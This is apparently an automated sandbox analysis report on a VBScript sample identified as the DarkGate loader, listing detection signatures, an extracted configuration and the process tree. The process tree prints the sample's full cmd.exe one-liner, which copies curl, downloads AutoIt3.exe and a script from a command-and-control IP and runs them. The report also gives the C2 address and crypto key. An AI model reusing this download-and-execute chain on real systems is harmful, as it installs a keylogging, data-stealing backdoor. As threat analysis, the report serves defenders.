Windows
Analysis Report
1.vbs
Overview
General Information
Detection
DarkGate
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Found malware configuration
Multi AV Scanner detection for submitted file
VBScript performs obfuscated calls to suspicious functions
Yara detected DarkGate
Sigma detected: DarkGate
System process connects to network (likely due to code injection or exploit)
Multi AV Scanner detection for domain / URL
Snort IDS alert for network traffic
Potential malicious VBS script found (suspicious strings)
Uses known network protocols on non-standard ports
C2 URLs / IPs found in malware configuration
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Found decision node followed by non-executed suspicious APIs
Queries the volume information (name, serial number etc) of a device
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to dynamically determine API calls
Contains functionality for execution timing, often used to detect debuggers
Queries information about the installed CPU (vendor, model number etc)
Queries the product ID of Windows
Java / VBScript file with very long strings (likely obfuscated code)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Detected TCP or UDP traffic on non-standard ports
Yara detected Keylogger Generic
Found large amount of non-executed APIs
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Classification
- System is w10x64
wscript.exe (PID: 5528 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\1.vbs " MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C) cmd.exe (PID: 6764 cmdline:
"C:\Window s\System32 \cmd.exe" /c mkdir c :\bpzs & c d /d c:\bp zs & copy c:\windows \system32\ curl.exe b pzs.exe & bpzs -H "U ser-Agent: curl" -o Autoit3.ex e http://9 4.228.169. 143:2351 & bpzs -o s zkzjr.au3 http://94. 228.169.14 3:2351/msi bpzszuqi & Autoit3.e xe szkzjr. au3 MD5: 4E2ACF4F8A396486AB4268C94A6A245F) conhost.exe (PID: 6808 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) bpzs.exe (PID: 6948 cmdline:
bpzs -H "U ser-Agent: curl" -o Autoit3.ex e http://9 4.228.169. 143:2351 MD5: BDEBD2FC4927DA00EEA263AF9CF8F7ED) bpzs.exe (PID: 6852 cmdline:
bpzs -o sz kzjr.au3 h ttp://94.2 28.169.143 :2351/msib pzszuqi MD5: BDEBD2FC4927DA00EEA263AF9CF8F7ED) Autoit3.exe (PID: 6116 cmdline:
Autoit3.ex e szkzjr.a u3 MD5: C56B5F0201A3B3DE53E561FE76912BFD)
- cleanup
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
DarkGate | First documented in 2018, DarkGate is a commodity loader with features that include the ability to download and execute files to memory, a Hidden Virtual Network Computing (HVNC) module, keylogging, information-stealing capabilities, and privilege escalation. DarkGate makes use of legitimate AutoIt files and typically runs multiple AutoIt scripts. New versions of DarkGate have been advertised on a Russian language eCrime forum since May 2023. | No Attribution |
{"C2 url": ["http://94.228.169.143"], "c2_port": 2351, "startup_persistence": true, "rootkit": true, "anti_vm": false, "check_disk": false, "min_disk": 100, "anti_analysis": true, "check_ram": false, "min_ram": 4096, "check_xeon": false, "internal_mutex": "txtMut", "crypter_rawstub": false, "crypter_dll": false, "crypter_au3": true, "flag_14": 4, "crypto_key": "IDmfxvToPtabWZ", "c2_ping_interval": 4, "anti_debug": true, "flag_18": true, "flag_19": true, "flag_22": 8080, "flag_23": "AA11", "flag_24": false, "flag_25": 60, "flag_26": true, "flag_27": false, "flag_28": false, "flag_29": true}
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_DarkGate_1 | Yara detected DarkGate | Joe Security | ||
JoeSecurity_DarkGate_1 | Yara detected DarkGate | Joe Security | ||
JoeSecurity_DarkGate_1 | Yara detected DarkGate | Joe Security | ||
JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security | ||
JoeSecurity_DarkGate_1 | Yara detected DarkGate | Joe Security |
Stealing of Sensitive Information |
---|
Source: | Author: Joe Security: |
Timestamp: | 94.228.169.143192.168.2.32351497132048098 09/23/23-08:02:03.355684 |
SID: | 2048098 |
Source Port: | 2351 |
Destination Port: | 49713 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
Click to jump to signature section
Show All Signature Results
AV Detection |
---|
Source: | Malware Configuration Extractor: |
Source: | Virustotal: | Perma Link |
Source: | Virustotal: | Perma Link | ||
Source: | Virustotal: | Perma Link |
Source: | Code function: | 4_2_00007FF7F8D3FD00 | |
Source: | Code function: | 4_2_00007FF7F8D3FCF0 | |
Source: | Code function: | 4_2_00007FF7F8D3FCA0 | |
Source: | Code function: | 4_2_00007FF7F8D2486C |